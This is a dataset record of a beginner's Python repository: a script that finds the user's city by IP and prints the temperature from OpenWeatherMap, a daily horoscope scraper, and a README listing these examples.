[ { "alpha_fraction": 0.6829745769500732, "alphanum_fraction": 0.7005870938301086, "avg_line_length": 41.58333206176758, "blob_id": "8fb35d19bbdc7fd7f49d5d94b6dda370e3b9d68f", "content_id": "e95a68fecdc46a3553597d120ba7d5f0d488cc56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 511, "license_type": "no_license", "max_line_length": 78, "num_lines": 12, "path": "/Weather.py", "repo_name": "Keerthanalaxmi/Pythonbasics", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\nimport urllib.request\nimport json\nresponse = urllib.request.urlopen('https://ipinfo.io/')\nout=json.load(response)\ncity_name=out['city']\nwith open('apikey','r') as f: api_key=f.readline().split('\\n')[0]\nbase_url='http://api.openweathermap.org/data/2.5/weather?'+'appid=%s' %api_key\nresponse = urllib.request.urlopen('%s&q=%s' %(base_url,city_name))\njson_data=json.load(response)\nprint('City Name is %s' %(city_name))\nprint(\"Temperature is {0:.2f}\".format(json_data['main']['temp']-273))\n" }, { "alpha_fraction": 0.7261146306991577, "alphanum_fraction": 0.7346072196960449, "avg_line_length": 32.5, "blob_id": "bb310b5ff327d0fb0bf58960dd947b8c4005575d", "content_id": "bab48489afae1f08bba0d58d7ef66b2b16a4b578", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 471, "license_type": "no_license", "max_line_length": 165, "num_lines": 14, "path": "/README.md", "repo_name": "Keerthanalaxmi/Pythonbasics", "src_encoding": "UTF-8", "text": "# Pythonbasics\nBasic Python examples\n\n1. Hangman_game.py :\n This is a game to predict the words by guessting a character at a time. The program takes the number of incorrect attempts and minimum length of word as input.\n \n2. Weather.py :\n Predicting the weather based on the location \n\n3. youtube_download_extract_info:\n Download/Extract information of a youtube file\n\n4. Get daily Horoscope:\n This program will get horoscope of your sunsign\n\n\n" }, { "alpha_fraction": 0.6700167655944824, "alphanum_fraction": 0.6783919334411621, "avg_line_length": 32, "blob_id": "06bdc25695f0da34c334591b2855ff414ac66fee", "content_id": "1eefbe985a7d6a9a05144c7335464fea25e87728", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 597, "license_type": "no_license", "max_line_length": 54, "num_lines": 18, "path": "/get_daily_horoscope.py", "repo_name": "Keerthanalaxmi/Pythonbasics", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport re\ndef daily_horoscope(sunsign):\n\turl = \"http://www.ganeshaspeaks.com/\" + sunsign + \\\n\t\"/\" + sunsign + \"-daily-horoscope.action\"\n\tcontent=urllib.request.urlopen(url)\n\tsoup=BeautifulSoup(content.read(),'html.parser')\n\traw_data=str(soup.find_all('p')[1])\n\tdate=re.search('[\\d]+-[\\d]+-[\\d]+',raw_data).group(0)\n\thoro=soup.find_all('p')[2].get_text()\n\tprint('The date is %s' %date)\n\tprint('The horoscope is %s' %horo)\n\nif __name__=='__main__':\n\tsunsign=input('Please enter the sunsign:')\n\tdaily_horoscope(sunsign)\n\t\n\n" } ]
3
elizabethtweedale/SuperSkill-9-Architecture
https://github.com/elizabethtweedale/SuperSkill-9-Architecture
57d6a0f7b36ee885d496687e71dd29f6e87c5bb2
77c863bc9f10d485a2aa9250685398757589bc55
85a13395057eeff653ca8d220882f44ae5f115f1
refs/heads/master
2020-05-23T10:44:51.776644
2017-03-12T22:43:13
2017-03-12T22:43:13
84,762,910
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.43838194012641907, "alphanum_fraction": 0.4454374313354492, "avg_line_length": 79.2264175415039, "blob_id": "71ff9b035694d9ccbea46d51a6f64fc14cccaf77", "content_id": "ee68ee99e07b02f1f718961a47554f3a8abc6d24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4252, "license_type": "no_license", "max_line_length": 143, "num_lines": 53, "path": "/Skyscraper-2.py", "repo_name": "elizabethtweedale/SuperSkill-9-Architecture", "src_encoding": "UTF-8", "text": "# Skyscraper Project - 2- Scales + Button - Python Code - Elizabeth Tweedale\nfrom tkinter import *\n\ndef newSkyscraper():\n winW = scaleWinW.get() # Get the number of windows wide from the scale\n winH = scaleWinH.get() # Get the number of windows high from the scale\n w = scaleW.get() # Get the width of the windows from the scale\n h = scaleH.get() # Get the height of the windows from the scale\n gap = scaleGap.get() # Get the window gap from the scale\n \n myBuilding.delete(\"all\") # This will clear the drawing before drawing new squares\n\n # Draw main building\n myBuilding.create_rectangle(gap,gap,(winW+2)*gap+winW*w,(winH+2)*gap+winH*h, # startX(left),starty(top),finishX(right),finishY(bottom)\n outline=\"gray\", fill=\"gray\") # outline and fill colours\n # Draw windows\n for i in range(winW):\n for j in range(winH):\n myBuilding.create_rectangle(((w+gap)*i+2*gap), # startX(left)\n ((h+gap)*j+2*gap), # startY(top)\n ((w+gap)*i+(2*gap+w)), # finsihX(right)\n ((h+gap)*j+(2*gap+h)), # finishY(bottom)\n outline=\"black\",fill=\"white\") # outline, fill colours\n # Try using different colours such as \"blue\" or \"red\"\n myBuilding.pack(fill=BOTH, expand=1) # Add ALL of the rectangles to your Canvas\n \n\"\"\" Main Program \"\"\"\nroot = Tk() # Set up Tkinter\nmyBuilding = Canvas(root, width=500, height=500) # Set up Canvas\nroot.title(\"Skyscraper\") # Set the title of your screen\nmyBuilding.pack() # Pack adds everything to the Tkinter Canvas\n\n\"\"\" Draw Scales \"\"\"\nscaleWinW = Scale(root, from_=5, to=30, orient=HORIZONTAL, label= \"Windows Wide\") # Create a scale for the number of windows wide\nscaleWinW.pack() # Add it to the Canvas\n# HINT - you can copy the above two lines for the next 4 scales and simply change the variable names - think of it like \"SPOT THE DIFFERENCE\"\nscaleWinH = Scale(root, from_=5, to=30, orient=HORIZONTAL, label= \"Windows High\") # Create a scale for the number of windows high\nscaleWinH.pack() # Add it to the Canvas\n\nscaleW = Scale(root, from_=5, to=30, orient=HORIZONTAL, label= \"Window Width\") # Create a scale for the windows' width\nscaleW.pack() # Add it to the Canvas\n\nscaleH = Scale(root, from_=5, to=30, orient=HORIZONTAL, label= \"Window Height\") # Create a scale for the windows' height\nscaleH.pack() # Add it to the Canvas\n\nscaleGap = Scale(root, from_=2, to=20, orient=HORIZONTAL, label= \"Window Gap\") # Create a scale for the size of the gap between windows...\nscaleGap.pack() # Did you notice the smaller numbers for the from_ and to?\n\n\"\"\" Draw Button \"\"\"\nbutton = Button(root, text=\"Draw Skyscraper\", command=newSkyscraper) # Create a button to draw the skyscraper\nbutton.pack() # Add it to the Canvas\n\nroot.mainloop() # start the main loop\n" } ]
1
rodrigocarlos2/GenerateSequency
https://github.com/rodrigocarlos2/GenerateSequency
74bf75d48534d6f59775fb23e413d40b1f7c58d5
0f11ce573cc7df4eb9c8e347bf5928b52897173c
b8fb528c032b4460447dade1f95e898be4333231
refs/heads/master
2021-03-27T15:32:26.788312
2017-07-13T18:01:40
2017-07-13T18:01:40
97,151,339
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5520833134651184, "alphanum_fraction": 0.5885416865348816, "avg_line_length": 11.733333587646484, "blob_id": "d1b0394b88e911d5e21b86cad70c68d7634efa82", "content_id": "58be40a077490efcbc9f26c92654b19569d59fec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/Source.py", "repo_name": "rodrigocarlos2/GenerateSequency", "src_encoding": "UTF-8", "text": "\na1 = input('Write the first element: ')\n\na1 = int(a1)\n\nan = input('Write the last element: ')\n\nan = int(an)\n\nr = input ('Write the reason: ')\n\nr = int(r)\n\nwhile a1<=an:\n\tprint(a1)\n\ta1 = a1+r\n" } ]
1
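Source.py above generates an arithmetic progression by looping from the first element to the last in steps of the "reason" (the common difference). A one-function equivalent using `range()` is sketched below (a hypothetical rewrite, assuming a positive step):

```python
def arithmetic_sequence(first, last, step):
    # range() stops before last + 1, so `last` is included when it lies on the progression
    return list(range(first, last + 1, step))

print(arithmetic_sequence(2, 10, 2))  # [2, 4, 6, 8, 10]
```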
alemhar/sftp_download-google_storage_upload
https://github.com/alemhar/sftp_download-google_storage_upload
400fccd7af2b40af18270c2189371591149a3f86
11a1ec345574f5e13d3645abfef00ea43bdd5e95
3c69254151cd6e765e813ebadca42f3a590ac535
refs/heads/main
2023-05-07T11:50:55.378452
2021-05-24T14:24:29
2021-05-24T14:24:29
370,379,013
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.652830183506012, "alphanum_fraction": 0.652830183506012, "avg_line_length": 27.106060028076172, "blob_id": "c569bb5bc3105d2020f182b74bb6e47ebe1e90e6", "content_id": "f6b3a8709f398e738692799db40200635cb82a39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1855, "license_type": "no_license", "max_line_length": 109, "num_lines": 66, "path": "/energylink.py", "repo_name": "alemhar/sftp_download-google_storage_upload", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport pysftp\nimport shutil\nfrom google.cloud import storage\ncnopts = pysftp.CnOpts()\ncnopts.hostkeys = None\n\n\nproject_id = 'project-id'\n\n\nsftp_username = 'username'\nsftp_userpass = 'password'\nsftp_server = \"ftp.server.com\"\nremote_path = \"file_directory\"\nlocal_path = \"c:/local/file/directory\"\n\nclient = storage.Client(project=project_id)\nbucket = client.get_bucket('google_bucket')\nblobs = client.list_blobs('google_bucket',prefix='sub_directory/', delimiter='/')\n\n\n# Get list of current \nbucket_files = []\nfor blob in blobs:\n bucket_file =blob.name.replace('sub_directory/','') \n if bucket_file:\n bucket_files.append(bucket_file)\n\n\n\nwith pysftp.Connection(host=sftp_server, username=sftp_username, password=sftp_userpass, cnopts=cnopts) as sftp:\n print(\"Connection succesfully stablished ... \")\n\n # Switch to a remote directory\n sftp.cwd(remote_path)\n\n # Obtain structure of the remote directory \n directory_structure = sftp.listdir_attr()\n\n for attr in directory_structure:\n if attr.filename in bucket_files:\n print ('Skip download, file exist: ' + attr.filename)\n \n else:\n print ('Downloading: ' + attr.filename)\n sftp.get('/' + remote_path + '/' + attr.filename, local_path + '/' + attr.filename)\n\n\n# loop in local download directory\nfor root, dirs, files in os.walk(local_path): \n for basename in files:\n # copy file to bucket \n # move file to archive folder\n # delete file from download folder\n \n\n blob = bucket.blob('xls/' + basename)\n blob.upload_from_filename('c:/local/file/directory/' + basename)\n\n file_des = 'c:/local/file/archive/' + basename \n file_src = 'c:/local/file/directory/' + basename\n shutil.move(file_src, file_des)\n \nprint ('Completed.')\n" } ]
1
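energylink.py above avoids re-downloading files by first listing the bucket's blobs, stripping the prefix, and skipping any SFTP file whose name is already present. A small sketch of that skip logic with the cloud listing stubbed out (hypothetical names; a set gives O(1) membership tests, unlike the list the script builds):

```python
already_uploaded = {"report_a.xls", "report_b.xls"}  # stand-in for bucket_files

def should_download(filename, uploaded):
    # mirror the script's check: fetch only names not yet in the bucket
    return filename not in uploaded

for name in ["report_a.xls", "report_c.xls"]:
    if should_download(name, already_uploaded):
        print("Downloading: " + name)
    else:
        print("Skip download, file exist: " + name)
```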
Vivvianne/Pitch
https://github.com/Vivvianne/Pitch
e0d91f7a97ad3a1ea4798ae14862347a5b5ab20b
e13a96252f7b83995c4849a3bd142c68df7921c8
864893bfbc6068448e4b791cce06ffe8dc646a99
refs/heads/master
2023-02-05T18:23:55.426285
2019-07-02T10:04:20
2019-07-02T10:04:20
194,226,961
0
0
MIT
2019-06-28T07:19:02
2019-07-02T10:04:23
2023-02-02T06:32:57
Python
[ { "alpha_fraction": 0.7318965792655945, "alphanum_fraction": 0.7370689511299133, "avg_line_length": 35.82539749145508, "blob_id": "559c07ecf4fff7ee92479e37bb17d55354487425", "content_id": "07387b59f9bd83e3b46710d16e9fcc6801aef47d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2320, "license_type": "permissive", "max_line_length": 297, "num_lines": 63, "path": "/README.md", "repo_name": "Vivvianne/Pitch", "src_encoding": "UTF-8", "text": "# A minute pitch App\n\nAuthor: Vivvianne Kimani\n\n## Description\n\nThis is a web application that allows various users to submit a short pitch. Users can also be able to view other pitches from different categories (Pick-up Lines, Interview Pitches, Product Pitches, Promotion Pitches), comment and vote. For a user to do any of that, they need to have registered.\n\n##User Stories\n\n* As a user I would like to view the different categories.\n* As a user I would like to see the pitches other people have posted.\n* As a user I would like to comment on the different pitches and leave feedback.\n* As a user I would like to submit a pitch in any category.\n* As a user I would like to vote on the pitch they liked and give it a downvote or upvote.\n\n## BDD\n\n| Behavior | Input | Output |\n|:---------|-------|--------|\n|signup/login field| Input credentials | A welcoming message |\n| Display Various Pitch Categories | N/A | Various pitches grouped by category are displayed |\n| Add category | Input a category | Inputed category dispalyed |\n| Add new pitch | Click New pitch | New pitch added |\n| Display pitches | Click on a Category | A page with a list of pitches from the selected category |\n| View Pitches | Click on a pitch | View a pitch and comments |\n| Comment on a pitch | Click Comment | Registered User displays a form where a user can comment on a certain pitch |\n\n## Prerequisites\n* Python3.6\n* Flask\n* Postgresql\n\n## Setup/Installation Requirements\n* Internet access\n* $ git clone https://github.com/kepha-okari/one-minute-pitch.git\n* $ cd one-minute-pitch\n* $ python3.6 -m venv virtual (install virtual environment)\n* $ source virtual/bin/activate\n* $ python3.6 -m pip install -r requirements.txt (install all dependencies)\n* Inside the manage.py module change the config_name parameter from 'production' to 'development' ie app = create_app('production') should be app = create_app('development')\n* $ ./start.sh\n\n## How the app works\nA user needs to sign up\nA user the needs to sign in to vote and post pitches\n\n## Live link\nYou can view the project from here https://pitchput.herokuapp.com/\n\n## Contacts\nFor further questions you can send an email to [email protected]\n\n## Technologies used \n\n* Python3.6\n* Flask framework\n* Bootstrap\n* PostgreSQL\n\n## License\n\nMIT (c) 2019 https://github.com/Vivvianne/Pitch/blob/master/LICENSE\n" }, { "alpha_fraction": 0.6315192580223083, "alphanum_fraction": 0.658730149269104, "avg_line_length": 25.727272033691406, "blob_id": "e73c7706429ef30ad54a74ac7d65ef36e69d94ff", "content_id": "c626f5429dc6e3b7cf62c94b290683a33746bcb3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 882, "license_type": "permissive", "max_line_length": 98, "num_lines": 33, "path": "/config.py", "repo_name": "Vivvianne/Pitch", "src_encoding": "UTF-8", "text": "import os\n\nclass Config:\n \n SQLACHEMY_TRACK_MODIFICATIONS = False\n #SQLALCHEMY_DATABASE_MODIFICATIONS = 
'postgresql+psycopg2://nkimani:her1234\\q@localhost/pitch'\n \n SECRET_KEY = 'Im not boarding'\n MAIL_SERVER = 'smtp.gmail.com'\n MAIL_PORT = 587\n MAIL_USE_TLS = True\n MAIL_USERNAME = os.environ.get(\"MAIL_USERNAME\")\n MAIL_PASSWORD = os.environ.get(\"MAIL_PASSWORD\")\n \nclass ProdConfig(Config):\n \n SQLALCHEMY_DATABASE_URI = os.environ.get(\"DATABASE_URL\")\n \n \nclass DevConfig(Config):\n \n SQLALCHEMY_DATABASE_URI='postgresql+psycopg2://nkimani:[email protected]/try'\n DEBUG = True\n \n#class TestConfig(Config):\n #SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://nkimani:her1234@localhost/pitch'\n \n \nconfig_options = {\n 'development': DevConfig,\n 'production': ProdConfig,\n #'test':TestConfig\n}\n" } ]
2
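config.py above selects a configuration class through the `config_options` dictionary; the README's note about changing `create_app('production')` to `create_app('development')` is exactly that lookup. A runnable sketch of the pattern with Flask stubbed out (hypothetical, so it executes without the framework installed):

```python
class Config:
    DEBUG = False

class DevConfig(Config):
    DEBUG = True

class ProdConfig(Config):
    pass

config_options = {"development": DevConfig, "production": ProdConfig}

def create_app(config_name):
    cfg = config_options[config_name]   # a bad name fails fast with a KeyError
    return {"DEBUG": cfg.DEBUG}         # stand-in for app.config.from_object(cfg)

print(create_app("development"))  # {'DEBUG': True}
```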
Ghaffaru15/house-price-prediction
https://github.com/Ghaffaru15/house-price-prediction
31d51088c0b07d6dd31e528577e02e3d26b4cdf0
145df3459ec721f12d611b39a6e3703471dbe0b9
97bc2e316f5f0e74d0481adec16b62977efaf8f1
refs/heads/master
2020-07-06T14:00:08.359013
2019-10-17T14:47:10
2019-10-17T14:47:10
203,040,732
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6049478054046631, "alphanum_fraction": 0.6466950178146362, "avg_line_length": 10.346490859985352, "blob_id": "347ff3b8fa0133bba9933374fa91c7c7d6c2659e", "content_id": "9eec6e1f2d5de602aaf352f42258d79c7548e5ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2587, "license_type": "no_license", "max_line_length": 124, "num_lines": 228, "path": "/model.py", "repo_name": "Ghaffaru15/house-price-prediction", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#Predicting the price of a house\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n\n# In[2]:\n\n\nhouse = pd.read_csv('home_data.csv')\n\n\n# In[3]:\n\n\nhouse.head()\n\n\n# In[4]:\n\n\nhouse.tail()\n\n\n# In[5]:\n\n\nhouse.info()\n\n\n# In[6]:\n\n\nhouse.describe()\n\n\n# In[7]:\n\n\nplt.figure(figsize=(10,6))\nplt.scatter(house.sqft_living,house.price)\nplt.xlabel('Sqft')\nplt.ylabel('Price')\n\n\n# In[8]:\n\n\n#getting line of best fit\nsns.lmplot('sqft_living','price', data=house)\n\n\n# In[9]:\n\n\nsns.heatmap(house.corr())\n\n\n# In[10]:\n\n\nsns.distplot(house.price, color='red')\n\n\n# In[11]:\n\n\nhouse.info()\n\n\n# In[12]:\n\n\nfeatures = house[['bedrooms','bathrooms','sqft_living','sqft_lot','floors','sqft_above','sqft_lot15','yr_built','condition',\n 'zipcode']]\n\nlabels = house['price']\n\n\n# In[13]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[14]:\n\n\n#training and testing, 75% for training, 25\nfeatures_train, features_test, labels_train, labels_test = train_test_split(features, labels, test_size=0.1, random_state=7)\n\n\n# In[15]:\n\n\n#verify size of feature training set\n\nprint (features_train.shape)\n\n\n# In[16]:\n\n\n#verify size of label training set\nprint(labels_train.shape)\n\n\n# In[17]:\n\n\nprint(features_test.shape)\n\n\n# In[18]:\n\n\nprint(labels_test.shape)\n\n\n# In[19]:\n\n\nfrom sklearn.linear_model import LinearRegression\n\n\n# In[20]:\n\n\nmodel = LinearRegression()\n\n\n# In[21]:\n\n\nmodel.fit(features_train,labels_train)\n\n\n# In[22]:\n\n\nprediction = model.predict(features_test)\n\n\n# In[34]:\n\n\nmodel.predict(features_test)[1]\n\n\n# In[32]:\n\n\nfeatures_test\n\n\n# In[43]:\n\n\nlabel_actual = pd.DataFrame(labels_test)\n\n\n# In[46]:\n\n\nlabel_actual.price\n# print(labels_test)\n\n\n# In[38]:\n\n\nmodel.predict([features_test.loc[12640]])\n\n\n# In[40]:\n\n\nfrom sklearn.metrics import mean_squared_error\n\n\n# In[52]:\n\n\nlabels_test\n\n\n# In[56]:\n\n\nfrom math import sqrt\nsqrt(mean_squared_error(labels_test, model.predict(features_test)))\n\n\n# In[54]\ntest_predict = pd.DataFrame({\n \"bedrooms\" : 5,\n \"bathrooms\" : 2,\n \"sqft_living\" : 1000,\n \"sqft_lot\" : 20456,\n \"floors\" : 2.0,\n \"sqft_above\" : 1480,\n \"sqft_lot15\" : 6005,\n \"yr_built\" : 1996,\n \"condition\" : 4,\n \"zipcode\" : 98064\n},index=[0])\n\n# print(str(model.predict(test_predict)).strip('[]'))\n\n#save the model\n#serialize model to json\n# model_json = model.to_json()\n# with open('model.json','w') as json_file:\n# json_file.write(model_json)\n\n# #save weights to HDF5\n# model.save_weights('model.h5')\n\nfrom joblib import dump, load\ndump(model,'model.joblib')\n" }, { "alpha_fraction": 0.7329608798027039, "alphanum_fraction": 0.7374301552772522, "avg_line_length": 51.70588302612305, "blob_id": "9e48f237b01d625ef4baec25d9e658133b823de6", "content_id": "c345ba24d475d022bb0181d0a03ac63817e62370", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 895, "license_type": "no_license", "max_line_length": 74, "num_lines": 17, "path": "/form.py", "repo_name": "Ghaffaru15/house-price-prediction", "src_encoding": "UTF-8", "text": "from flask_wtf import FlaskForm\nfrom wtforms import IntegerField, SubmitField\nfrom wtforms.validators import DataRequired\n\n\nclass PredictionForm(FlaskForm):\n bedrooms = IntegerField('Bedrooms', validators=[DataRequired()])\n bathrooms = IntegerField('Bathrooms', validators=[DataRequired()])\n sqft_living = IntegerField('Sqtf living', validators=[DataRequired()])\n sqft_lot = IntegerField('Sqft lot', validators=[DataRequired()])\n floors = IntegerField('Floors', validators=[DataRequired()])\n sqft_above = IntegerField('Sqft above', validators=[DataRequired()])\n sqft_lot15 = IntegerField('Sqft lot15', validators=[DataRequired()])\n yr_built = IntegerField('Yr built', validators=[DataRequired()])\n condition = IntegerField('Condition', validators=[DataRequired()])\n zipcode = IntegerField('Zip code', validators=[DataRequired()])\n submit = SubmitField('Predict')" }, { "alpha_fraction": 0.6359223127365112, "alphanum_fraction": 0.6548004150390625, "avg_line_length": 31.526315689086914, "blob_id": "6cf883b234b0d3404be80b3b9460aeb75481b2d6", "content_id": "68d77a8cf72175b19048a001c2d2e558660ffcb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1854, "license_type": "no_license", "max_line_length": 99, "num_lines": 57, "path": "/app.py", "repo_name": "Ghaffaru15/house-price-prediction", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request, url_for, flash, redirect, jsonify\nfrom form import PredictionForm\nimport pandas as pd\nimport numpy as np\nimport joblib\nimport json\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = '15d1a4704a23a032d3695927a8e3dff5'\n\n\[email protected]('/', methods=['GET', 'POST'])\ndef home():\n form = PredictionForm()\n if form.validate_on_submit():\n data = [form.bedrooms.data, form.bathrooms.data, form.sqft_living.data, form.sqft_lot.data,\n form.floors.data, form.sqft_above.data, form.sqft_lot15.data, form.yr_built.data,\n form.condition.data, form.zipcode.data]\n model = joblib.load('model.joblib')\n result = model.predict([data])\n actual_result = str(result).strip('[]')\n flash('Predicted Price: $' + actual_result, 'success')\n return redirect(url_for('home'))\n return render_template('index.html', form=form)\n\n\[email protected]('/api/predict', methods=['POST'])\ndef predict():\n bedrooms = request.json['bedrooms']\n bathrooms = request.json['bathrooms']\n sqft_living = request.json['sqft_living']\n sqft_lot = request.json['sqft_lot']\n floors = request.json['floors']\n sqft_above = request.json['sqft_above']\n sqft_lot15 = request.json['sqft_lot15']\n yr_built = request.json['yr_built']\n condition = request.json['condition']\n zipcode = request.json['zipcode']\n\n data = [bedrooms,bathrooms,sqft_living,sqft_lot,floors,sqft_above,sqft_lot15,yr_built,\n condition,zipcode]\n\n model = joblib.load('model.joblib')\n result = model.predict([data])\n actual_result = str(result).strip('[]')\n\n return jsonify({'predicted': actual_result})\n\n\[email protected]('/pred', methods=['POST'])\ndef dummy():\n\n return jsonify({'test': request.json})\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=36174)\n" } ]
3
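app.py above calls `joblib.load('model.joblib')` inside every request handler. One common refinement is to load the serialized model once and reuse it across requests; a hedged sketch follows (assuming the `model.joblib` file produced by model.py exists on disk):

```python
import joblib

_model = None

def get_model(path="model.joblib"):
    # lazy-load on first use, then serve the cached object to later requests
    global _model
    if _model is None:
        _model = joblib.load(path)
    return _model
```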
kastiglione/lldb-topython
https://github.com/kastiglione/lldb-topython
a81831358779c74ea4c9465e05e553e97ed61eec
2e684e21612eede9f3244875f78ba371598f7eba
a0beb1012c5980c2da886e55fd9a9c16be8f6b8b
refs/heads/master
2020-03-20T12:57:38.319719
2018-06-15T06:41:45
2018-06-15T06:41:45
137,444,948
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7577399611473083, "alphanum_fraction": 0.7616099119186401, "avg_line_length": 31.299999237060547, "blob_id": "fc14623c717f000955f94968277c0794d64d5db4", "content_id": "844d500c1a1db12fde0d5343aa2e43d41b547ae4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1292, "license_type": "permissive", "max_line_length": 101, "num_lines": 40, "path": "/README.md", "repo_name": "kastiglione/lldb-topython", "src_encoding": "UTF-8", "text": "# lldb-topython\n\n#### Examples\n\n```\n(lldb) topython po\nHelp on method EvaluateExpression in lldb.SBFrame:\n\nlldb.SBFrame.EvaluateExpression = EvaluateExpression(self, *args) unbound lldb.SBFrame method\n EvaluateExpression(self, str expr) -> SBValue\n EvaluateExpression(self, str expr, DynamicValueType use_dynamic) -> SBValue\n EvaluateExpression(self, str expr, DynamicValueType use_dynamic, bool unwind_on_error) -> SBValue\n EvaluateExpression(self, str expr, SBExpressionOptions options) -> SBValue\n \n The version that doesn't supply a 'use_dynamic' value will use the\n target's default.\n```\n\n```\n(lldb) topython break mod -i 0 --enable\nHelp on method SetIgnoreCount in lldb.SBBreakpoint:\n\nlldb.SBBreakpoint.SetIgnoreCount = SetIgnoreCount(self, *args) unbound lldb.SBBreakpoint method\n SetIgnoreCount(self, uint32_t count)\n\nHelp on method SetEnabled in lldb.SBBreakpoint:\n\nlldb.SBBreakpoint.SetEnabled = SetEnabled(self, *args) unbound lldb.SBBreakpoint method\n SetEnabled(self, bool enable)\n\nlldb.SBBreakpoint.SetEnabled(True)\n```\n\n```\n(lldb) topython thread jump\nHelp on method JumpToLine in lldb.SBThread:\n\nlldb.SBThread.JumpToLine = JumpToLine(self, *args) unbound lldb.SBThread method\n JumpToLine(self, SBFileSpec file_spec, uint32_t line) -> SBError\n```\n" }, { "alpha_fraction": 0.6486080884933472, "alphanum_fraction": 0.6490174531936646, "avg_line_length": 33.08372116088867, "blob_id": "733fa3b859f42cb045fbd94d1fbfa9c70f60e49d", "content_id": "7f239e43237eba033e20eea4446ff2a300f07985", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7328, "license_type": "permissive", "max_line_length": 96, "num_lines": 215, "path": "/topython.py", "repo_name": "kastiglione/lldb-topython", "src_encoding": "UTF-8", "text": "import lldb\nimport re\nimport argparse\nimport shlex\n\n# `topython` translates LLDB commands to Python API. The translation happens\n# using the following dictionaries.\n\n# The `CommandAPIs` dictionary translates full commands to one or more Python\n# APIs. 
Before this can be used, any given command must first be expanded using\n# `ResolveCommand()`, which turns aliases (`po`) and abbreviations (`br s`) to\n# canonical full commands.\nCommandAPIs = {\n ### Thread Commands\n \"thread step-over\": [\"lldb.SBThread.StepOver\"],\n \"thread step-in\": [\"lldb.SBThread.StepInto\"],\n \"thread step-inst\": [\"lldb.SBThread.StepInstruction(False)\"],\n \"thread step-inst-over\": [\"lldb.SBThread.StepInstruction(True)\"], # TODO: Document parameter\n \"thread return\": [\"lldb.SBThread.ReturnFromFrame(SBFrame, SBValue)\"],\n \"thread jump\": [\"lldb.SBThread.JumpToLine\", \"lldb.SBFrame.SetPC\"], # TODO: Jump to address\n \"thread until\": [\"lldb.SBThread.StepOverUntil\"],\n\n ### Process Commands\n \"process continue\": [\"lldb.SBProcess.Continue\"],\n\n ### Expression Command\n \"expression\": [\n \"lldb.SBFrame.EvaluateExpression\",\n \"lldb.SBTarget.EvaluateExpression\",\n # \"lldb.SBExpressionOptions\",\n ],\n\n ### Frame Commands\n \"frame variable\": [\n \"lldb.SBFrame.GetVariables\",\n \"lldb.SBFrame.FindVariable\",\n ],\n # \"frame info\": [],\n\n ### Breakpoint Commands\n \"breakpoint set\": [\n \"lldb.SBTarget.BreakpointCreateByAddress\",\n \"lldb.SBTarget.BreakpointCreateByLocation\",\n \"lldb.SBTarget.BreakpointCreateByName\",\n \"lldb.SBTarget.BreakpointCreateByNames\",\n \"lldb.SBTarget.BreakpointCreateByRegex\",\n \"lldb.SBTarget.BreakpointCreateBySBAddress\",\n \"lldb.SBTarget.BreakpointCreateBySourceRegex\",\n ],\n # \"breakpoint clear\": ...,\n \"breakpoint command\": [\n \"lldb.SBBreakpoint.SetCommandLineCommands\",\n \"lldb.SBBreakpoint.SetScriptCallbackBody\",\n \"lldb.SBBreakpoint.SetScriptCallbackFunction\",\n ],\n \"breakpoint delete\": [\n \"lldb.SBTarget.DeleteAllBreakpoints\",\n \"lldb.SBTarget.BreakpointDelete\",\n ],\n \"breakpoint disable\": [\n \"lldb.SBTarget.DisableAllBreakpoints\",\n \"lldb.SBBreakpoint.SetEnabled(False)\",\n ],\n \"breakpoint enable\": [\n \"lldb.SBTarget.EnableAllBreakpoints\",\n \"lldb.SBBreakpoint.SetEnabled(True)\",\n ],\n \"breakpoint list\": [\n \"lldb.SBTarget.breakpoint_iter\",\n \"lldb.SBTarget.GetNumBreakpoints\",\n \"lldb.SBTarget.GetBreakpointAtIndex\",\n # \"lldb.SBTarget.GetBreakpointNames\",\n ],\n \"breakpoint modify\": [\n \"lldb.SBBreakpoint.SetAutoContinue\",\n \"lldb.SBBreakpoint.SetCondition\",\n \"lldb.SBBreakpoint.SetIgnoreCount\",\n \"lldb.SBBreakpoint.SetOneShot\",\n \"lldb.SBBreakpoint.SetQueueName\",\n \"lldb.SBBreakpoint.SetThreadIndex\",\n \"lldb.SBBreakpoint.SetThreadName\",\n # \"lldb.SBBreakpoint.SetThreadID\"\n ],\n \"breakpoint name\": [\n \"lldb.SBBreakpoint.AddName\",\n \"lldb.SBBreakpoint.GetNames\",\n \"lldb.SBBreakpoint.MatchesName\",\n \"lldb.SBBreakpoint.RemoveName\",\n ],\n\n ### Register Commands\n \"register read\": [\n 